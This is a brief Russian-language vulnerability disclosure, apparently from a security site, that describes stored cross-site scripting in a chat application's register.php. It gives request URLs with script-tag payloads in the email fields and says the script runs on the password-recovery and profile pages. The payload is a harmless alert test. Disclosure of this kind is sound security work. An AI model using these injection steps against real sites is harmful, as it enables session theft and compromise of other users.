Действия: 

1) Регистрация:
 
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert
("Test!")</sc*ipt>&email1=<scr*pt>alert («Test!»)</scr*pt>

2) При выполнении функции возвращения пароля CSS выполнится:
 
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG 

3)При просмотре профиля CSS выполнится:
 
http://[victim]/chat_dir/profile.php?username=OverG



Оставить мнение